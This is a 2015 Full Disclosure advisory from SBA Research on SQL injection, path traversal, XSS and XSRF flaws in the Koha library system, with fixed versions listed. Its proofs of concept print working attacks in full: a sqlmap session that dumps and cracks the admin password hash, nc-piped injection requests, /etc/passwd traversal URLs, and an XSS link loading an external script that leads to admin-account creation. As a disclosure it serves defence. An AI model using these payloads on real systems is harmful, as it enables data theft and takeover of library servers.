[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS
From: Raschin Ghanad-Tavakoli <RGhanad-Tavakoli () sba-research ! org>
Date: 2015-06-25 17:01:01
Message-ID: 1435251638046.5953 () sba-research ! org
[Download RAW message or body]
===============================================================================================
SBA Research Vulnerability Disclosure
===============================================================================================
title: Koha Unauthenticated SQL injection
product: Koha ILS
affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version: 3.20.1, 3.17.8, 3.16.12
CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact: critical
website: http://www.koha-community.org/
found by: Raschin Tavakoli / SBA Research Combinatorial Security Testing Group
contact: cst@sba-research.org
References: http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
===============================================================================================
=========================
1. Mutiple SQL Injections
=========================
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633) +
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
Vulnerability:
--------------
The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.
Impact:
-------
By injecting malicious sql code a remote attacker can access the database and read arbritary data. If the \
webserver is misconfigured, the file-system may be accessed as well.
References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
# ################################################################################################## #
# PoC: #
# ################################################################################################## #
1. Inspect Koha database schema
Have a look at how to query the database for superlibrarian users:
http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians
So basically we we need to execute some SQL statement like this:
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by \
borrowernumber desc limit 1;
2. Query the database with sqlmap
So let's fire up sqlmap with the --sql-shell parameter and input the query:
root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p \
number --technique=T --dbms=MySQL --sql-shell --time-sec=4 _
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150513}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. \
It is the end user's responsibility to obey all applicable local, state and federal laws. Developers \
assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:20:07
[09:20:07] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: number (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
Payload: number=1 PROCEDURE \
ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
---
[09:20:09] [INFO] testing MySQL
[09:20:09] [INFO] confirming MySQL
[09:20:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select userid, password from borrowers where flags=1 and password is not null order by \
borrowernumber desc limit 1; [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select \
userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit \
1' [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into \
distinct queries to be able to retrieve the output even if we are going blind [09:20:25] [WARNING] \
time-based comparison requires larger statistical model, please wait.............................. \
[09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based \
payloads to prevent potential errors admin
[09:21:46] [INFO] retrieved: $2a$08$taQ
[09:23:33] [ERROR] invalid character detected. retrying..
[09:23:33] [WARNING] increasing time delay to 5 seconds
afOgEEhU
[09:25:10] [ERROR] invalid character detected. retrying..
[09:25:10] [WARNING] increasing time delay to 6 seconds
t/gW
[09:26:13] [ERROR] invalid character detected. retrying..
[09:26:13] [WARNING] increasing time delay to 7 seconds
TOmqnYe1Y6ZNxCENa
[09:29:57] [ERROR] invalid character detected. retrying..
[09:29:57] [WARNING] increasing time delay to 8 seconds
2.ONk2eZhnuEw5z9OjjxS
[09:35:08] [ERROR] invalid character detected. retrying..
[09:35:08] [WARNING] increasing time delay to 9 seconds
select userid, password from borrowers where flags=1 and password is not null order by borrowernumber \
desc limit 1;: 'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'
3. Feed john the ripper and be lucky
root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > \
./admin-pass root@kali:/home/wicked# john ./admin-pass
Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
admin (?)
guesses: 1 time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015) c/s: 260 trying: Smokey - allstate
Use the "--show" option to display all of the cracked passwords reliably
root@kali:/home/wicked# john ./admin-pass --show
?:admin
1 password hash cracked, 0 left
4. Log in with username "admin" and password "admin" ;)
# ################################################################################################## #
# PoC End #
# ################################################################################################## #
+ +++++++++++++++++++++++++++++++++++ +
+ b) SQL Injection in STAFF interface +
+ +++++++++++++++++++++++++++++++++++ +
Vulnerability:
--------------
An SQL Injection vulnerability exists in /cgi-bin/koha/reports/borrowers_out.pl allows remote attacker's \
to read arbritrary data via the database due to improper input validation of the parameters Filter and \
Criteria.
Impact:
-------
By injection malicious sql a remote attacker can read arbitrary data from the database. If the webserver \
is misconfigured, read & write access to the filesystem may be possible.
References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
# ################################################################################################## #
# PoC: #
# ################################################################################################## #
====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: \
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&u \
serid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc \
testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: \
186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&u \
serid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc \
testbox 9002
====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: \
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep \
=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc \
testbox 9002
echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: \
183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep \
=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc \
testbox 9002
====================================================================
You will notice different output in every second request, demonstrating the evaluation of the payload.
# ################################################################################################## #
# PoC End #
# ################################################################################################## #
=================================
3. Path Traversal (CVE-2015-4633)
=================================
Vulnerability
-------------
The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is \
vulnerable to Path Traversal.
Impact
------
A remote attacker my read arbitrary files on the system.
References
----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
# ################################################################################################## #
# PoC: #
# ################################################################################################## #
The following input is used to print out /etc/passwd:
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
# ################################################################################################## #
# PoC End #
# ################################################################################################## #
=================================
4. XSS and XSRF
=================================
Vulnerability
-------------
Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The \
site also lacks in the implementation of challenge tokens that prevent cross-site forgery (XSRF) \
attacks.
The attack can be performed by:
- through a compromised user account. User/Password retrieval can happen via brute force, sniffing or \
through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)
The following pages are affected from stored XSS flaws:
/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl
The following pages are affected from relfective XSS flaws:
/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value")
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", \
"EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") /cgi-bin/koha/suggestion/suggestion.pl \
(parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", \
"publishercode",
\
"suggesteddate_from", "suggesteddate_to")
Impact
----------
The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:
- escalate privileges by targeting staff members with XSRF
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities.
References
----------------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
# ################################################################################################## #
# PoC / Attack Scenario: #
# ################################################################################################## #
Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some \
forum) and clicks the following link:
--> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='h \
ttp://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0
Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the \
public lists in order to delete the entry. Once he opens
--> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl
the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions \
of user bob. For example:
Create new user:
-----------------------
--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowern \
umber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipco \
de=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipc \
ode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1= \
&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontact \
phone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7C \
dateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06% \
2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode= \
P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFES \
SION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1
Give the new user superlibririan permission:
----------------------------------------------------------
--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian
The attacker can now log as superlibrarian.
Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog \
interface at the time of when clicking the malicious link. Alice needs to have access to the OPAC \
interface and to have permissions to create public lists.
# ################################################################################################## #
# PoC / Attack Scenario End #
# ################################################################################################## #
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic